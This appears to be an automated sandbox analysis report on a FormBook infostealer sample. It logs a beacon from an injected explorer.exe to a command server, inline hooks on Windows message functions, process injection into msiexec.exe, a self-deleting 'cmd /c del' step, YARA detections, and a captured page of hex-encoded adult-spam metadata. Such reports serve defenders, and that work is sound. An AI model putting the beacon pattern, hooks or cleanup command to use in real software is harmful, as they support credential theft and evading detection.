              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba a3 b0 b2 c1 c3 ce c2 cd a8 d1 b6 b9 c9 b7 dd d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 30 31 33 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 34 34 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 32 39 30 39 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 33 31 30 33 38 3b 26 23 32 31 33 30 36 3b 26 23 33 31 30 37 30 3b 26 23 33 39 35 33 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 38 37 3b 26 23 38 37 3b 26 23 38 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 
33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 32 39 30 39 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 33 31 30 33 38 3b 26 23 32 31 33 30 36 3b 26 23 33 31 30 37 30 3b 26 23 33 39 35 33 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 38 37 3b 26 23 38 37 3b 26 23 38 37 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 30 31 33 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 34 34 39 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36
              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#65;&#86;&#20135;&#22312;&#32447;&#31934;&#21697;&#20122;&#27954;&#31532;&#19968;&#31449;,&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#35266;&#30475;,&#22909;&#30007;&#20154;&#31038;&#21306;&#31070;&#39532;&#22312;&#32447;&#35266;&#30475;&#87;&#87;&#87;</title><meta name="keywords" content="&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#35266;&#30475;,&#22909;&#30007;&#20154;&#31038;&#21306;&#31070;&#39532;&#22312;&#32447;&#35266;&#30475;&#87;&#87;&#87;,&#20122;&#27954;&#65;&#86;&#20135;&#22312;&#32447;&#31934;&#21697;&#20122;&#27954;&#31532;&#19968;&#31449;" /><meta name="description" content="&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#3526


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49775 | 35.204.150.5 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 15:57:26.578011036 CEST | 10348 | OUT | GET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1
              Host: www.higginsuotdoors.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
May 27, 2022 15:57:26.608874083 CEST | 10349 | IN | HTTP/1.1 301 Moved Permanently
              content-length: 0
              location: https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ
              connection: close


              Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xEB


              Target ID:0
              Start time:15:55:22
              Start date:27/05/2022
              Path:C:\Users\user\Desktop\lamsddre43321.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\lamsddre43321.exe"
              Imagebase:0x400000
              File size:278417 bytes
              MD5 hash:B1FCF52DEB6F04EF0F898C9938F26920
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:15:55:23
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\rlpjf.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
              Imagebase:0x1a0000
              File size:134144 bytes
              MD5 hash:FB06AEE14DBF93907437AB4372B1BBDE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Antivirus matches:
              • Detection: 37%, ReversingLabs
              Reputation:low

              Target ID:2
              Start time:15:55:25
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\rlpjf.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
              Imagebase:0x1a0000
              File size:134144 bytes
              MD5 hash:FB06AEE14DBF93907437AB4372B1BBDE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Target ID:3
              Start time:15:55:31
              Start date:27/05/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff6b8cf0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              Target ID:15
              Start time:15:56:18
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\msiexec.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\msiexec.exe
              Imagebase:0xfd0000
              File size:59904 bytes
              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              Target ID:16
              Start time:15:56:21
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
              Imagebase:0xc20000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:17
              Start time:15:56:22
              Start date:27/05/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7c9170000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly